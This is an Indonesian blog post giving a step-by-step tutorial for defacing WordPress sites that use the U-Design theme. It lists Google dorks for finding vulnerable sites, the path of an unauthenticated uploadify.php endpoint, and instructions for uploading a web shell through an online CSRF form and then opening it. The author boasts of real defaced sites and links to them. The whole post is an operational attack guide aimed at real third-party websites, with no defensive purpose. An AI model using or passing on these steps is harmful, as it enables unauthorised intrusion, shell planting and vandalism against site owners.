Tutorial Deface WordPress Theme U-Design

Monday, July 18, 2016

Tutorial Deface WordPress Theme U-Design

Tutorial Deface WordPress Theme U-Design
Om-om TKJ Cyber Art pinjem gambar lagi yak :D

Waduhh udah lama juga nih kaga posting, tadi nya mau posting cepet2 eh aku nya dapet musibah "Kacamata ku patah" terpaksa di lem dan solasiban :v ok langsung aja deh biar cepet setoran di mirror, ini dia "Tutorial Deface WordPress Theme U-Design" langsung simak baik2 aja

Bahan-Bahan :

1. Maskawin seperangkat alat sholat

2. Buku Nikah dan penguhulu

3. Dork :
Standar : inurl:/wp-content/themes/u-design/
yang saya pakai : inurl:/wp-content/themes/u-design/sliders/ site:uk
Note : uk nya boleh di ganti dengan domain yang lain

4. Exploit : /wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php

5. CSRF : Karya Drach Levia - Touch Me Senpai :* 

Step by Step :

1. Dorking dulu di gugel, terserah mau dorking biasa atau dorking gambar

2. Jika sudah dapat target masukan exploit. Contoh : www.targetsuka.co.li/[path]/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php

3. Juka Vuln Akan Blank biasanya, selain blank mungkin kaga vuln

4. Masukan url target kalian ke CSRF online, post name nya pilih Filedata, klik next lalu upload file kalian :v

5. Jika vuln/berhasil hasil nya akan seperti ini

Tutorial Deface WordPress Theme U-Design
Sukses kaka :*
 6. Akses shell nya www.targetsuka.co.li/namafile.php atau www.targetsuka.co.li/[path]/namafile.php

7. Dan jrengg jrenggg :v akses shell sudah berhasil di buka :v (jangan main buka-bukaan ah :v)

Tutorial Deface WordPress Theme U-Design

Hasil deface saya :
http://allwikan-dev-factory.com/wordpress/
https://defacer.id/122637.html

ALLAH SWT. : atas segala-galanya

Mamah & Almarhum Papah : atas semua jasa & kasih sayangnya (segala-galanya juga)

Teman-Teman GSH : atas dukungannya, sampai saya bisa banyak ilmunya

IndoXploit : atas shellnya

Guru-Guru saya :
Pak Nanang & Pak Dedi (Guru TKJ)
Yukinoshita47 (Guru Cyber)
Drach Levia a.k.a Lynoc a..a kGeonyc X (Guru Bahasa Program)

Other :
Nabilah JKT48 : atas pesonanya
Sri Ayu Nawang Wulan : atas -_- ahh.... sudahlah itu pacar orang

Like juga ya Fanspage kami :

Related Post

Next
Previous
Click here for Comments

0 comments:

*Komentar Dengan Sopan !
*Jangan OOT
*I am Just Newbie